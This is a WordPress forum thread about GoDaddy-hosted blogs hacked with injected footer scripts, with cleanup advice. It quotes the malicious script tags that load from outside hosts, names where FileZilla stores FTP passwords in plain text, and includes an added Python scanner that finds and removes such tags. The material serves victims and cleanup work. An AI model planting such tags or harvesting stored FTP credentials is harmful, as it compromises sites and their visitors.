• My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:

    <script src="http://cechirecom.com/js.php"></script>

    I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I’ll probably do a clean install later.

    But what worries me is that I am careful about blog security. I always update to the latest WordPress install as soon as it comes out, I always check plugins and only use the bare minimum, I have very strong passwords…

    So…does anyone know if it could be Godaddy servers that have the problem? Or do I need to go through every WordPress hardening tip out there just to avoid this kind of thing?

Viewing 15 replies - 1 through 15 (of 29 total)
  • Hello Arthur,

    Same thing here. I just restored a website for a client 2 days ago and this morning it got this new malware. It has the same beginning injected code, but the script in the footer was different.

    We just restored it to yesterday’s date to see if that takes care of it.

    Check my blog post to see some things you can try.

    http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/

    Let me know if you need any help.

    Securely yours,

    Regina Smola

    A few of our customers were affected. Here’s what our CISO had to say about it:

    “WordPress is a-ok. Go Daddy is rock solid. Neither were ‘hacked,’ as some have speculated.

    After an extensive investigation, we can report there was a small group of customers negatively impacted. What happened? Those users had outdated versions of the popular blogging software, set up in a particular way.

    This underscores the importance of installing the latest Web applications, no matter where you are on the Internet. If you use Hosting Connection, automatically update WordPress to version 2.9.2 using the simple 3-step update offered when you log-in.

    And, while we’re on the topic of Web security and Best Practices – be sure all your online passwords are unique, secure, and in a safe place.”

    If you have questions or you’d like someone to take a look at your WordPress site, please get in touch with our 24/7 support team at http://fwd4.me/MBI

    Alicia

    I was hacked on April 21 and now April 30. Go Daddy offered NO HELP. Said I would have to pay 150.00 to have them restore my hosting. Claimed it was not their fault. It would be most helpful if Go Daddy offered some assistance rather than denying they had any responsibility in the matter.

    redkathy,

    We’ve posted instructions for fixing the issue at http://fwd4.me/MFK. Please make sure that you follow all of the steps, including the ‘permanent fix’.

    Salem

    um…I can say, in total honesty, without hesitation, that the two blogs hosted on GoDaddy that I support were both running 2.9.2. I’m interested in what the “particular way” the compromised blogs were set up in…

    Hi, my blog was also hacked I think. I cannot submit replies to comments like I used to, WordPress runs slower than normal, and the Dashboard looks different when I open it up on Firefox. What do I need to do to restore it back to normal?

    @Hulbert: if you’re on a Linux server, you can restore an earlier version of your files: http://help.godaddy.com/article/5091
    GoDaddy has recommended backing up your database and any uploaded files, deleting your full WP installation, and reinstalling to the most recent version, but I don’t see how that is any better than restoring the files (unless there was a stray php file that was infected in the earlier version with potential to infect others). That method would be more complete, however, and may be an option if you’re on a Windows server and don’t have the option to restore from a previous backup (I’ve only tried the restore on a Linux server, so I don’t know if it’s possible or not on Windows, but the help doc only refers to this being possible on Linux).
    http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it/

    @jazzs3quence Thank you for your help. This is an email I got today.

    Hulbert,

    Thanks for your message. We did a scan of your website, and showed malicious malware scripts on your site:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    <script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Known javascript malware:
    XML-RPC server accepts POST requests only.<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

    Can I still use your method to solve this issue?

    Sorry to be so late jumping in here, but here goes.

    Many of these and other website infections are the result of stolen FTP or other login passwords.

    These are typically stolen by a virus on a PC that has FTP access to the infected website. Especially when the website has been re-infected a few times.

    I know everyone has anti-virus software installed, however, with so many variants of viruses the anti-virus (AV) companies have a difficult time keeping up. All it takes is one minute that your AV software isn’t up-to-date and you can be infected (well, your PC).

    From there the virus learns how to evade detection of the AV software. If you’re using one of the free FTP programs, like FileZilla and you store your passwords in the software so you don’t have to login each time you want to transfer files, the login credentials are stored in a plain text file.

    For FileZilla, you can see the file here:

    C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml (user could be Administrator if you’re logging into your PC as Administrator)

    All the information a virus needs is stored right there in plain text. It steals this information and sends it to a server which then logs in to the website, downloads files, injects the malscript and then uploads them back to the website. If you have your FTP logs activated, you can see where the infected files came from.

    The virus also works by “sniffing” the FTP traffic. Since FTP transmits all data, including username and password in plain text, it’s easy for the virus to see and steal the information this way as well. I have a YouTube video showing this here: http://www.youtube.com/watch?v=oYI1kssrrbc

    Like I said the virus learns how to evade detection of the currently installed anti-virus software so you may need to use something different. Many have had good success with one of the following: Kaspersky, Avast or Vipre. If you’re already using one of these, then try one of the other two – it has to be different.

    So, first change all FTP passwords. I generally recommend setting up a separate username and password for each user and make sure FTP logging is activated. That way if you do get infected, you can look in the logs and know for certain who was the cause.

    Second, install a new AV and scan all PCs.

    Third, remove the malscripts. If you have your website downloaded to your PC, you can use a program like grepWin (it’s free) to find and remove the malscript.

    Fourth, if Google has blacklisted you, you’ll have to request a review from the Google Webmaster tools.

    We clean websites for a living so I do know what I’m talking about here.
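The "find and remove the malscript" step above, as an added example that is not part of the original post: a Python script that walks a local copy of the site, reports every `<script src>` tag loading from a host outside an allow list, and strips those tags on request. The allow list, the scanned file suffixes and the sample site (including the host `injected.example`) are assumptions constructed for the example.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# An empty <script src="..."></script> element: the shape of the injected tag.
SCRIPT_TAG = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>\s*</script>',
    re.IGNORECASE)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".tpl"}

def scan_and_clean(root, allowed_hosts, fix=False):
    """Map each file under root to the script URLs it loads from hosts that are
    not in allowed_hosts. With fix=True, strip those tags and keep a .bak copy."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        # latin-1 maps every byte to one character, so the round trip is lossless.
        text = path.read_bytes().decode("latin-1")
        bad = []
        def strip(match):
            host = urlparse(match.group(1)).hostname
            if host is None or host.lower() in allowed_hosts:
                return match.group(0)  # relative URL or allow-listed host: keep
            bad.append(match.group(1))
            return ""
        cleaned = SCRIPT_TAG.sub(strip, text)
        if bad:
            findings[path.relative_to(root).as_posix()] = bad
            if fix:
                path.with_name(path.name + ".bak").write_bytes(text.encode("latin-1"))
                path.write_bytes(cleaned.encode("latin-1"))
    return findings

def demo():
    """Run against a constructed one-file site; hosts and paths are made up."""
    with tempfile.TemporaryDirectory() as root:
        footer = Path(root, "wp-content", "themes", "mytheme", "footer.php")
        footer.parent.mkdir(parents=True)
        footer.write_text('<script src="/js/site.js"></script>\n'
                          '<?php wp_footer(); ?>\n'
                          '<script src="http://injected.example/js.php"></script>\n')
        report = scan_and_clean(root, {"ajax.googleapis.com"}, fix=True)
        return report, footer.read_text(), Path(str(footer) + ".bak").exists()

if __name__ == "__main__":
    print(demo())
```

Run it with `fix=False` first and review the report before rewriting anything. It matches only the literal tag form quoted in this thread, so obfuscated injections need a separate search.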

    Just so GD hosting knows this.

    I have personally helped fix over 23 Godaddy Hosted WordPress Hacked sites in the last 2 weeks.

    “WordPress is a-ok. Go Daddy is rock solid. Neither were ‘hacked,’ as some have speculated.”

    That quote is a little BS to me at this time.

    When users are FTP’ing up their wordpress installation they more than likely do not know anything about permissions and did not set anything specific for their hosting.

    I am more prone to think that GoDaddy has a user account directory fail where the scripts can search directory structures to modify PHP files.

    Why do I believe this? Because on one of the GoDaddy accounts for the calamitiesofnature.com site they do *not* use wordpress and had the same hack in their PHP files.

    – Phil

    It’s a jungle out there.

    Hello I have just cleared the blog of the malscripts and done the steps recommended by WeWatch.

    My wp admin dashboard is still mismatched, how can I solve this?

    I posted a ton of solutions specific to a hacked WordPress account on Go Daddy. Don’t pay the $150. All they do is go into your File Manager, click on History and then the restore button. This will not work. You have to reinstall themes, sometimes plugins. It’s all in the article. Hope that helps if not just ask. Fix WordPress after Hack

    hi, i received an email

    WordPress Security Issue – Please Upgrade As Soon As Possible

    i already have the new version of wordpress

    I called godaddy and they said to call wordpress. (no listing for wordpress)

    anyways!!

    and my dashboard is messed up so i clicked on the 4 column and refreshed the page and it corrected the dashboard on the main dashboard but the

    post dashboard
    and so is the comment dashboard

    is messed up still.

    how can i get my dashboard to the normal way so i can continue with my blog.!!

    please. helpme111

  • The topic ‘Godaddy wordpress blog hacked’ is closed to new replies.